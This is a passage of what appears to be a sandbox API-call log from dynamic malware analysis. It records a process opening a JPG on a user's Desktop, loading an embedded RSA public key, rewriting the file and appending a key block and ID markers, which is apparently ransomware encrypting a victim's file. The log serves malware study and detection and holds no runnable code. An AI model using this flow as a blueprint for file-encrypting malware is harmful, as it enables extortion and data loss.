out: hHeap=0x680000) returned 1 [0094.783] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0c637c0, ftCreationTime.dwHighDateTime=0x1d5b60e, ftLastAccessTime.dwLowDateTime=0x81246f30, ftLastAccessTime.dwHighDateTime=0x1d5c2b7, ftLastWriteTime.dwLowDateTime=0x81246f30, ftLastWriteTime.dwHighDateTime=0x1d5c2b7, nFileSizeHigh=0x0, nFileSizeLow=0x17fe1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yx6 GdWti8.jpg", cAlternateFileName="YX6GDW~1.JPG")) returned 1 [0094.783] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.783] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0094.783] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.783] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Yx6 GdWti8.jpg") returned=".jpg" [0094.783] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Yx6 GdWti8.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yx6 gdwti8.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.784] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=98273) returned 1 [0094.784] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.786] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x17fbb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.786] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.787] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.787] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x17fe1, lpOverlapped=0x0) returned 1 [0094.788] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.788] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.788] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.788] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.788] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.789] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.789] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.789] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.789] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.789] GetLastError () returned 0x0 [0094.789] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.789] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.789] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.789] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.789] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.789] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x17fe0) returned 0x9a06a00 [0094.790] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3f10 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9198 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3f58 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91b0 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91e0 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91f8 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.791] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91e0 | out: hHeap=0x680000) returned 1 [0094.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91f8 | out: hHeap=0x680000) returned 1 [0094.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d91f8 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d91e0 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91f8 | out: hHeap=0x680000) returned 1 [0094.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91e0 | out: hHeap=0x680000) returned 1 [0094.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.792] GetCurrentThreadId () returned 0x8c4 [0094.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e2240 [0094.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.792] GetCurrentThreadId () returned 0x8c4 [0094.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.793] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.793] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.793] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.793] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.793] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91e0 [0094.793] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0094.793] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91f8 [0094.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91c8 [0094.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9210 [0094.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e68 [0094.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0094.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91e0 | out: hHeap=0x680000) returned 1 [0094.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d91e0 [0094.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91e0 | out: hHeap=0x680000) returned 1 [0094.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0094.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9210 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91f8 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91c8 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d91b0 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3f58 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.796] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x17fdc, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x17fdc, lpOverlapped=0x0) returned 1 [0094.797] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0094.797] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x17fe1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.797] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.797] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0094.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0094.798] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.798] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.798] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.798] CloseHandle (hObject=0x6a8) returned 1 